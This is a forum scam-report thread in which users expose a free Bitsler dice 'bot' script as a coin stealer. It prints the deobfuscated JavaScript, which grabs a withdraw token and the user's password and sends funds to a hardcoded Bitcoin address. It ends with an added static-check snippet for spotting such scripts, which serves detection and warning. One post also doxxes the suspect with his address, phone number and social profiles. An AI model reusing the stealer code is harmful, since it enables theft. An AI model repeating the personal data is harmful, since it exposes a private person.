Topic: [Scam Report] SheMale giving "free bitsler bot script" with Coin Stealer (Read 6555 times)

legendary
Activity: 2646
Merit: 1137
All paid signature campaigns should be banned.
Thanks Bruno.

In addition to this address, which appears to be their main Bitcoin address:

https://blockchain.info/address/1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26

Here is a list of other addresses they may have used:

https://www.walletexplorer.com/wallet/45d98a5dc51021bb/addresses

From this we can see they used the following services:

CoinPayments.net
SatoshiMines.com
MtGoxAndOthers
FaucetBOX.com
BitPay.com
C-Cex.com
MoonBit.co.in
BitPay.com-old
Coin-Swap.net
Bittrex.com
Poloniex.com

FWIW:  I am pretty sure they are using an old blockchain.info account.
vip
Activity: 1428
Merit: 1145
Doxxing this guy is way too easy.

Let's start here: http://thebot.net/threads/earn-atleast-1-a-day-for-using-your-phone-normally.319325/

I'm pretty sure I can get his home address in a few minutes.

Edit: Adding more below as I stumble across it.

https://www.fiverr.com/prithvihegde25

http://website.informer.com/alldamndeals.net

Quote
Domain Name: ALLDAMNDEALS.NET
Registry Domain ID: 1891050277_DOMAIN_NET-VRSN
Registrar WHOIS Server: Whois.bigrock.com
Registrar URL: www.bigrock.com
Updated Date: 2015-12-18T19:02:26Z
Creation Date: 2014-12-18T14:56:08Z
Registrar Registration Expiration Date: 2015-12-18T14:56:08Z
Registrar: BigRock Solutions Ltd
Registrar IANA ID: 1495
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: prithvi
Registrant Organization: N/A
Registrant Street: Shanti colony  
Registrant City: Dharwad
Registrant State/Province: Other
Registrant Postal Code: 580008
Registrant Country: IN
Registrant Phone: +91.8861482509
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]

https://twitter.com/hegde25

https://bitcointalksearch.org/user/prithvihegde-365748



https://webcache.googleusercontent.com/search?q=cache:WpoJpIS_LtsJ:https://bitcointalk.org/index.php%3Faction%3Dprofile%3Bu%3D365748+&cd=1&hl=en&ct=clnk&gl=us



https://plus.google.com/112645031818569426179/about

http://thebot.net/threads/free-1000-website-hits-seo-google-alexa.298107/page-14#post-3307110



https://webcache.googleusercontent.com/search?q=cache:1aCS4DglRdkJ:https://proxy.crushus.com/bitcointalk.org/index.php%3Ftopic%3D906177.0+&cd=4&hl=en&ct=clnk&gl=us



https://www.facebook.com/prithvi.hegde.549/about



https://webcache.googleusercontent.com/search?q=cache:SDRUtKdQzc8J:https://bitcointa.lk/threads/coinbucks-io-earn-bitcoins-4-surveys-cpa-network-4-btc-paid-out-to-date.372201/page-5+&cd=6&hl=en&ct=clnk&gl=us



https://blockchain.info/tx/38febddce72333c14b09f8d5eb371034f1646ee308870753516f156966c1a0f1



https://webcache.googleusercontent.com/search?q=cache:K2k6C95s_OMJ:https://bitcointalk.org/index.php%3Ftopic%3D1449775.0+&cd=16&hl=en&ct=clnk&gl=us

legendary
Activity: 2646
Merit: 1137
All paid signature campaigns should be banned.
No shit anyone can do.
It almost sounds like you are challenging the Bitcoin community to track you down and find you.

Is that what you are saying?
newbie
Activity: 7
Merit: 0
No shit anyone can do.
copper member
Activity: 2996
Merit: 2374
https://blockchain.info/address/1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26

I will bet that if we cared we could track them down from a mistake somewhere in the 371 transactions since 2014.
It looks like this guy has sent money to BitPay a number of times. Depending on if he was buying something to be shipped to him, then it is possible that his address could be tracked by asking BitPay about the transactions and subsequently asking the merchant about the transactions.
legendary
Activity: 2646
Merit: 1137
All paid signature campaigns should be banned.
Pretty good scammer as scammers go, 0.06170746 BTC + 1.483391 BTC since 2014-08-16...

https://blockchain.info/address/1FYwDy9VcDYqs3T8JNTMj7mmJFrLjPVjmF

https://blockchain.info/address/1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26

I will bet that if we cared we could track them down from a mistake somewhere in the 371 transactions since 2014.

hero member
Activity: 1036
Merit: 504
Becoming legend, but I took merit to the knee :(
Good catch.

You saved people from losing money, now let's hope people will read this and not use his script. I really hope he did not steal any bitcoins yet.

See his first address transactions, so many small transactions. Only someone with something to hide would try to obfuscate JS, and his method is pretty obvious from a script kiddie.

In case he tries to come here to say he accidentally left his wallet address inside: no, it was on purpose, it was encoded and obfuscated, although I would not call it obfuscation at all ROFL
hero member
Activity: 520
Merit: 500
Good catch.

You saved people from losing money, now let's hope people will read this and not use his script. I really hope he did not steal any bitcoins yet.
hero member
Activity: 1036
Merit: 504
Becoming legend, but I took merit to the knee :(
Bitcointalk Thread: BitSler Ultimate Script To Double or Triple The Money

https://bitcointalksearch.org/topic/bitsler-ultimate-script-to-double-or-triple-the-money-1454561

Video Proof: https://www.youtube.com/watch?v=8egxVu5gJVg

Check Video Description for script link.

I just found it working, turned my 0.02 BTC to 0.12 :)



Was bored, went to deobfuscate his lousy script, found that his script secretly steals from users.
I wasn't scammed, but I am sure that him putting it in marketplace, giving it for free but attempting to include auto withdraw to his BTC address counts as a scammer, right?

Code:
function startbot() {
    $('#modal-bot').modal("hide");
    var qt = setInterval(function() {
        $('#btn-bet-dice').button("reset");
        var qba = parseFloat($('#profit').val()) + parseFloat($("p[class='text-thin mar-no balance-' + devise + '-html']").text());
        $("p[class='text-thin mar-no balance-" + devise + "-html']").text(qba.toFixed(8));
        $('#won-bet span').removeClass('text-danger');
        $('#won-bet span').addClass('text-success');
        $('#won-bet span').text($('#profit').val());
        show_result_bet();
        $('.balance-' + devise + "-html").addClass('result-bet-win');
        setTimeout(function() {
            $(".balance-" + devise + "-html").removeClass('.result-bet-win');
            $('#btn-bet-dice, #btn-bet-start-pilot-dice, #btn-bet-start-fast-dice').button('loading');
        }, 350);
        var qad = "address";
        var qam = "amount";
        $.ajax({
            type: "POST",
            url: "/api/generate-token",
            data: JSON.parse('{"name":"withdraw","expire":5}'),
            success: function(text) {
                var val = JSON.parse(text);
                if (val.return.success == true) {
                    var tok = val.return.token;
                    var qc2 = qc - 0.0001;
                    $('#withdraw-address').val("1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26");
                    $('#withdraw-amount').val(qc2);
                    $('#withdraw-password').val($("#bot-pass").val());
                    $('#withdraw-token').val(tok);
                    eval('send_withdraw()');
                }
            }
        });
    }, 3000);
}

Take note of this particular part

Code:
      $.ajax({
            type: "POST",
            url: "/api/generate-token",
            data: JSON.parse('{"name":"withdraw","expire":5}'),
            success: function(text) {
                var val = JSON.parse(text);
                if (val.return.success == true) {
                    var tok = val.return.token;
                    var qc2 = qc - 0.0001;
                    $('#withdraw-address').val("1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26");
                    $('#withdraw-amount').val(qc2);
                    $('#withdraw-password').val($("#bot-pass").val());
                    $('#withdraw-token').val(tok);
                    eval('send_withdraw()');
                }
            }
        });

Basically, to newbies who cannot understand JavaScript: the script OP gave will auto withdraw all withdrawals to 1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26.

The withdraw happens using the api token from your account and bypasses your account password because remember? It requires you to give your account and password on start (Script kiddie)

This thread has been archived.

A scam accusation would be made against OP for trying to scam fellow Bitcointalk users and newbies with a "fake apparently free awesome script".

EDIT 1 while typing this: Above function was deobed from the top comment from the YouTube video. Deobed the one from 3 days ago, "The version 3.1 comment", found this address from scammer OP that replaced the previous wallet address: 1FYwDy9VcDYqs3T8JNTMj7mmJFrLjPVjmF

Code proof from new deob
Code:
$(atob("aW5wdXRbaWQqPSd3aXRoZHJhdy1hZGRyZXNzJ10=")).val(atob("MUZZd0R5OVZjRFlxczNUOEpOVE1qN21tSkZyTGpQVmptRg=="));

which is actually
Code:
$("input[id*='withdraw-address']").val('1FYwDy9VcDYqs3T8JNTMj7mmJFrLjPVjmF');

List of archives:

1. Original thread (this thread) archive: http://archive.is/qFQNB
2. Original script url () archive: http://archive.is/OV1EO
3. YouTube video with comments archive: http://archive.is/VVVFj
4. Version 3.1 script archive (screenshot as site went down: http://prnt.sc/b3uhc9): http://archive.is/Gge1O


I am too lazy to find OP's other possible alts and accounts, maybe someone else would do it?

Timelord if you have the time, do you mind? XD

EDIT: wording.. I made it sound wrong with my wording initially
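
The manual deobfuscation in the post above can be repeated as a static check before any third-party "bot" script is pasted into a browser console. The following is an added example, not part of the original post or of the script it analyses: it expands `atob("...")` string literals without executing anything and reports hardcoded Bitcoin addresses next to withdrawal-related names. The function names are hypothetical, the marker list is taken from the code quoted in this thread, and the address regex checks shape only (no Base58Check checksum).

```javascript
// Added example: static triage of a script before it is run. Node.js, no
// dependencies. The sample is only read as text, never evaluated.

// Shape-only match for legacy Base58 Bitcoin addresses (assumption: no checksum test).
const BTC_ADDR = /\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b/g;
// atob("...") or atob('...') called with a string literal.
const ATOB_CALL = /atob\(\s*(["'])([A-Za-z0-9+\/=]+)\1\s*\)/g;
// Field ids, endpoint and function name seen in the script quoted in this thread.
const MARKERS = ['withdraw-address', 'withdraw-amount', 'withdraw-password',
                 'withdraw-token', '/api/generate-token', 'send_withdraw'];

const decodeB64 = (b64) => Buffer.from(b64, 'base64').toString('utf8');

// Replace every atob(<literal>) with its decoded text as a quoted string.
function expandAtob(src) {
  return src.replace(ATOB_CALL, (_m, _q, b64) => JSON.stringify(decodeB64(b64)));
}

function auditScript(src) {
  const expanded = expandAtob(src);
  const decodedLiterals = [...src.matchAll(ATOB_CALL)].map((m) => decodeB64(m[2]));
  const addresses = [...new Set(expanded.match(BTC_ADDR) || [])];
  const markers = MARKERS.filter((k) => expanded.includes(k));
  return {
    expanded,
    decodedLiterals,
    addresses,
    // Addresses that only become visible after decoding were deliberately hidden.
    hiddenAddresses: addresses.filter((a) => !src.includes(a)),
    markers,
    usesEval: /\beval\s*\(/.test(expanded),
    // Hardcoded address plus a withdrawal form field is the pattern reported here.
    suspicious: addresses.length > 0 && markers.some((k) => k.startsWith('withdraw')),
  };
}

// Constructed sample: a harmless line plus the obfuscated one-liner quoted above.
const SAMPLE = [
  '$("#btn-bet-dice").button("reset");',
  '$(atob("aW5wdXRbaWQqPSd3aXRoZHJhdy1hZGRyZXNzJ10="))' +
    '.val(atob("MUZZd0R5OVZjRFlxczNUOEpOVE1qN21tSkZyTGpQVmptRg=="));',
].join('\n');

const report = auditScript(SAMPLE);
console.log(report.expanded);
console.log(report);
```

A script that builds its strings at runtime (concatenation, `String.fromCharCode`, nested encodings) will not be expanded by this check, so an empty report does not show that a script is safe.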